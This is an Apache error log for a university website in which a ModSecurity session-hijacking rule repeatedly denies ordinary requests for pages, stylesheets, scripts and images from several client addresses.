[Mon Aug 28 08:32:25.880737 2023] [:error] [pid 38498] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5KcCo-f0AAJZiBScAAAAA"]
[Mon Aug 28 08:32:30.168192 2023] [:error] [pid 37539] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv5LsCo-f0AAJKjaLMAAAAG"]
[Mon Aug 28 08:32:31.634670 2023] [:error] [pid 38499] [client 125.164.23.211] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOv5L8Co-f0AAJZjv4UAAAAC"]
[Mon Aug 28 08:32:33.719422 2023] [:error] [pid 37539] [client 125.164.23.211] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv5McCo-f0AAJKjaLQAAAAG"]
[Mon Aug 28 08:32:33.915130 2023] [:error] [pid 38386] [client 125.164.18.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5McCo-f0AAJXyN9sAAAAM"]
[Mon Aug 28 08:32:41.291368 2023] [:error] [pid 38500] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5OcCo-f0AAJZkdi0AAAAD"]
[Mon Aug 28 08:32:41.969362 2023] [:error] [pid 38498] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5OcCo-f0AAJZiBSkAAAAA"]
[Mon Aug 28 08:32:42.146879 2023] [:error] [pid 37539] [client 114.122.73.147] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5OsCo-f0AAJKjaLUAAAAG"]
[Mon Aug 28 08:32:42.288732 2023] [:error] [pid 38379] [client 114.122.73.147] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5OsCo-f0AAJXrIucAAAAP"]
[Mon Aug 28 08:32:44.672774 2023] [:error] [pid 38500] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv5PMCo-f0AAJZkdi8AAAAD"]
[Mon Aug 28 08:32:44.678298 2023] [:error] [pid 38498] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv5PMCo-f0AAJZiBSoAAAAA"]
[Mon Aug 28 08:32:44.706743 2023] [:error] [pid 37539] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv5PMCo-f0AAJKjaLYAAAAG"]
[Mon Aug 28 08:32:45.287730 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv5PcCo-f0AAJTinmEAAAAE"]
[Mon Aug 28 08:32:46.350908 2023] [:error] [pid 38389] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv5PsCo-f0AAJX1kj0AAAAS"]
[Mon Aug 28 08:32:47.040831 2023] [:error] [pid 38379] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5P8Co-f0AAJXrIugAAAAP"]
[Mon Aug 28 08:32:47.217012 2023] [:error] [pid 37539] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5P8Co-f0AAJKjaLcAAAAG"]
[Mon Aug 28 08:33:27.608158 2023] [:error] [pid 37539] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5Z8Co-f0AAJKjaLwAAAAG"]
[Mon Aug 28 08:33:29.659812 2023] [:error] [pid 37539] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5acCo-f0AAJKjaMMAAAAG"]
[Mon Aug 28 08:33:37.078591 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv5ccCo-f0AAJTinn8AAAAE"]
[Mon Aug 28 08:33:37.092979 2023] [:error] [pid 38059] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv5ccCo-f0AAJSr29EAAAAO"]
[Mon Aug 28 08:33:37.094761 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv5ccCo-f0AAJTinoAAAAAE"]
[Mon Aug 28 08:33:37.094794 2023] [:error] [pid 38499] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv5ccCo-f0AAJZjv6QAAAAC"]
[Mon Aug 28 08:33:37.095367 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv5ccCo-f0AAJX1kloAAAAS"]
[Mon Aug 28 08:33:37.182948 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5ccCo-f0AAJX1klsAAAAS"]
[Mon Aug 28 08:33:39.064782 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv5c8Co-f0AAJXrIwQAAAAP"]
[Mon Aug 28 08:33:39.064822 2023] [:error] [pid 38059] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv5c8Co-f0AAJSr29kAAAAO"]
[Mon Aug 28 08:33:39.099684 2023] [:error] [pid 38389] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv5c8Co-f0AAJX1kmAAAAAS"]
[Mon Aug 28 08:33:39.100258 2023] [:error] [pid 37539] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv5c8Co-f0AAJKjaM0AAAAG"]
[Mon Aug 28 08:33:39.250829 2023] [:error] [pid 38499] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv5c8Co-f0AAJZjv6oAAAAC"]
[Mon Aug 28 08:33:56.123168 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5hMCo-f0AAJXrIzAAAAAP"]
[Mon Aug 28 08:33:56.200821 2023] [:error] [pid 38499] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5hMCo-f0AAJZjv7kAAAAC"]
[Mon Aug 28 08:34:03.565278 2023] [:error] [pid 38114] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5i8Co-f0AAJTinrQAAAAE"]
[Mon Aug 28 08:34:03.616233 2023] [:error] [pid 37539] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5i8Co-f0AAJKjaQQAAAAG"]
[Mon Aug 28 08:34:13.002842 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv5lcCo-f0AAJXrI1gAAAAP"]
[Mon Aug 28 08:34:13.179068 2023] [:error] [pid 38059] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5lcCo-f0AAJSr3CYAAAAO"]
[Mon Aug 28 08:34:37.856026 2023] [:error] [pid 38386] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv5rcCo-f0AAJXyOH8AAAAM"]
[Mon Aug 28 08:34:37.878839 2023] [:error] [pid 38114] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv5rcCo-f0AAJTinvwAAAAE"]
[Mon Aug 28 08:34:37.897727 2023] [:error] [pid 38502] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv5rcCo-f0AAJZmo4YAAAAA"]
[Mon Aug 28 08:34:37.899052 2023] [:error] [pid 38500] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv5rcCo-f0AAJZkdnQAAAAD"]
[Mon Aug 28 08:34:37.899126 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv5rcCo-f0AAJXrI38AAAAP"]
[Mon Aug 28 08:34:37.907204 2023] [:error] [pid 38114] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv5rcCo-f0AAJTinv0AAAAE"]
[Mon Aug 28 08:34:37.907988 2023] [:error] [pid 38065] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv5rcCo-f0AAJSxZFAAAAAH"]
[Mon Aug 28 08:34:37.931853 2023] [:error] [pid 38499] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv5rcCo-f0AAJZjwBYAAAAC"]
[Mon Aug 28 08:34:37.955206 2023] [:error] [pid 38502] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv5rcCo-f0AAJZmo4cAAAAA"]
[Mon Aug 28 08:34:37.956786 2023] [:error] [pid 38386] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv5rcCo-f0AAJXyOIAAAAAM"]
[Mon Aug 28 08:34:37.956888 2023] [:error] [pid 38065] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv5rcCo-f0AAJSxZFEAAAAH"]
[Mon Aug 28 08:34:37.965006 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv5rcCo-f0AAJXrI4AAAAAP"]
[Mon Aug 28 08:34:37.966723 2023] [:error] [pid 38500] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv5rcCo-f0AAJZkdnUAAAAD"]
[Mon Aug 28 08:34:38.006509 2023] [:error] [pid 38499] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv5rsCo-f0AAJZjwBcAAAAC"]
[Mon Aug 28 08:34:38.006896 2023] [:error] [pid 38386] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv5rsCo-f0AAJXyOIEAAAAM"]
[Mon Aug 28 08:34:38.007583 2023] [:error] [pid 38389] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv5rsCo-f0AAJX1ku0AAAAS"]
[Mon Aug 28 08:34:38.011881 2023] [:error] [pid 38502] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv5rsCo-f0AAJZmo4gAAAAA"]
[Mon Aug 28 08:34:38.021147 2023] [:error] [pid 38500] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv5rsCo-f0AAJZkdnYAAAAD"]
[Mon Aug 28 08:34:38.021315 2023] [:error] [pid 38065] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv5rsCo-f0AAJSxZFIAAAAH"]
[Mon Aug 28 08:34:38.057111 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv5rsCo-f0AAJXrI4EAAAAP"]
[Mon Aug 28 08:34:38.059705 2023] [:error] [pid 38502] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv5rsCo-f0AAJZmo4kAAAAA"]
[Mon Aug 28 08:34:38.067563 2023] [:error] [pid 38503] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv5rsCo-f0AAJZnSMAAAAAB"]
[Mon Aug 28 08:34:38.068505 2023] [:error] [pid 38499] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv5rsCo-f0AAJZjwBgAAAAC"]
[Mon Aug 28 08:34:38.079462 2023] [:error] [pid 38065] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv5rsCo-f0AAJSxZFMAAAAH"]
[Mon Aug 28 08:34:38.083752 2023] [:error] [pid 38114] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv5rsCo-f0AAJTinv4AAAAE"]
[Mon Aug 28 08:34:38.198724 2023] [:error] [pid 38386] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5rsCo-f0AAJXyOIIAAAAM"]
[Mon Aug 28 08:34:45.190718 2023] [:error] [pid 38500] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv5tcCo-f0AAJZkdoQAAAAD"]
[Mon Aug 28 08:34:45.245546 2023] [:error] [pid 38114] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5tcCo-f0AAJTinwsAAAAE"]
